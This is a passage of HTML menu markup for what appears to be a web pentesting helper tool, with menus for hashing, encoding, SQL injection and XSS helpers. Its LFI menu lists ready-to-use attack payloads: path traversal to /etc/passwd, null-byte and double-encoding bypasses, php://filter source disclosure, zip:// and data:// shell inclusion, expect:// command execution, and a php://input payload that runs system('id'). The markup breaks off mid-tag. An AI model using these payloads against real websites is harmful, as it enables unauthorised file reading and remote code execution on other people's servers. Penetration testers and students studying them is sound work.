<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<link rel="stylesheet" href="css/bootstrap.min.css"/>
<link rel="stylesheet" href="css/style.css"/>
</head>
<body>
<div class="container-fluid" style="padding-top: 5px;">
<nav class="navbar navbar-default">
<div class="collapse navbar-collapse">
<ul class="nav navbar-nav" tabindex="-1" id="menu_btn">
<li class="dropdown">
<a href="#" tabindex="-1" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-haspopup="true" aria-expanded="false">Encryption <span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#" id='md5'><img src="img/encryption.png"/> MD5</a></li>
<li><a href="#" id='sha1'><img src="img/encryption.png"/> SHA-1</a></li>
<li><a href="#" id='sha256'><img src="img/encryption.png"/> SHA-256</a></li>
<li><a href="#" id='rot13'><img src="img/encryption_weak.png"/> ROT13</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" tabindex="-1" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-haspopup="true" aria-expanded="false">Encoding <span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#" id='base64_encode'><img src="img/uue.png"/> Base64 Encode</a></li>
<li><a href="#" id='base64_decode'><img src="img/uud.png"/> Base64 Decode</a></li>
<li><a href="#" id='url_encode'><img src="img/urle.png"/> URL Encode</a></li>
<li><a href="#" id='url_decode'><img src="img/urld.png"/> URL Decode</a></li>
<li><a href="#" id='hex_encode'><img src="img/hexencode.png"/> Hex Encode</a></li>
<li><a href="#" id='hex_decode'><img src="img/hexdecode.png"/> Hex Decode</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" tabindex="-1" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-haspopup="true" aria-expanded="false">SQL <span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#" id='sql_mysql_char'><img src="img/mysql.png"/> MySQL CHAR()</a></li>
<li><a href="#" id='sql_basic_info_column'><img src="img/mysql.png"/> Basic info column</a></li>
<li><a href="#" id='sql_convert_utf8'><img src="img/database_convert.png"/> Convert using UTF-8</a>
</li>
<li><a href="#" id='sql_convert_latin1'><img src="img/database_convert.png"/> Convert using
Latin-1</a></li>
<li><a href="#" id='sql_mssql_char'><img src="img/database.png"/> MSQL CHAR()</a></li>
<li><a href="#" id='sql_oracle_char'><img src="img/database.png"/> Oracle CHAR()</a></li>
<li><a href="#" id='sql_union_statement'><img src="img/database.png"/> Union Select Statment</a>
</li>
<li><a href="#" id='sql_spaces_to_inline_comments'><img src="img/database.png"/> Spaces to
inline comments</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" tabindex="-1" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-haspopup="true" aria-expanded="false">XSS <span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#" id='xss_string_from_charcode'><img src="img/xss.png"/> String.fromCharCode</a>
</li>
<li><a href="#" id='xss_html_characters'><img src="img/xss.png"/> HTML Characters</a></li>
<li><a href="#" id='xss_alert'><img src="img/xss_alert.png"/> XSS Alert</a></li>
</ul>
</li>
<li class="dropdown" id="lfi">
<a href="#" tabindex="-1" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-haspopup="true" aria-expanded="false">LFI <span class="caret"></span></a>
<ul class="dropdown-menu">
<li class="dropdown-submenu">
<a href="#">Basic</span></a>
<ul class="dropdown-menu">
<li class="dropdown-submenu">
<a href="#">Basic LF</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=../../../etc/passwd</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">Null byte</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=../../../etc/passwd%00</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">Double encoding</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=%252e%252e%252fetc%252fpasswd</a></li>
<li><a href="#" class="lfi_data">?page=%252e%252e%252fetc%252fpasswd%00</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">Path and dot truncation</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=../../../etc/passwd............[ADD MORE]</a></li>
<li><a href="#" class="lfi_data">?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]</a></li>
<li><a href="#" class="lfi_data">?page=../../../etc/passwd/./././././.[ADD MORE]</a></li>
<li><a href="#" class="lfi_data">?page=../../../[ADD MORE]../../../../etc/passwd</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">Filter bypass tricks</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=....//....//etc/passwd</a></li>
<li><a href="#" class="lfi_data">?page=..///////..////..//////etc/passwd</a></li>
<li><a href="#" class="lfi_data">?page=../../../etc/passwd/./././././.[ADD MORE]</a></li>
<li><a href="#" class="lfi_data">?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd</a></li>
</ul>
</li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">Using wrappers</span></a>
<ul class="dropdown-menu">
<li class="dropdown-submenu">
<a href="#">php://filter</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=php://filter/read=string.rot13/resource=index.php</a></li>
<li><a href="#" class="lfi_data">?page=php://filter/convert.base64-encode/resource=index.php</a></li>
<li><a href="#" class="lfi_data">?page=pHp://FilTer/convert.base64-encode/resource=index.php</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">zip://</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=zip://shell.jpg%23payload.php</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">data://</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=data://text/plain;base64,[base64_encode_shell]</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">expect://</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=expect://id</a></li>
<li><a href="#" class="lfi_data">?page=expect://ls</a></li>
</ul>
</li>
<li class="dropdown-submenu">
<a href="#">input://</span></a>
<ul class="dropdown-menu">
<li><a href="#" class="lfi_data">?page=php://input | POST DATA: <?php system('id'); ?></a></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li class="dropdown">
<a href="#" tabindex="-1" class="dropdown-toggle" data-toggle="dropdown" role="button"
aria-haspopup="true" aria-expanded="false">XXE <span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#" id='sql_mysql_char'>Comming soon</a></li>
</ul>
</li>
<li class=
评论0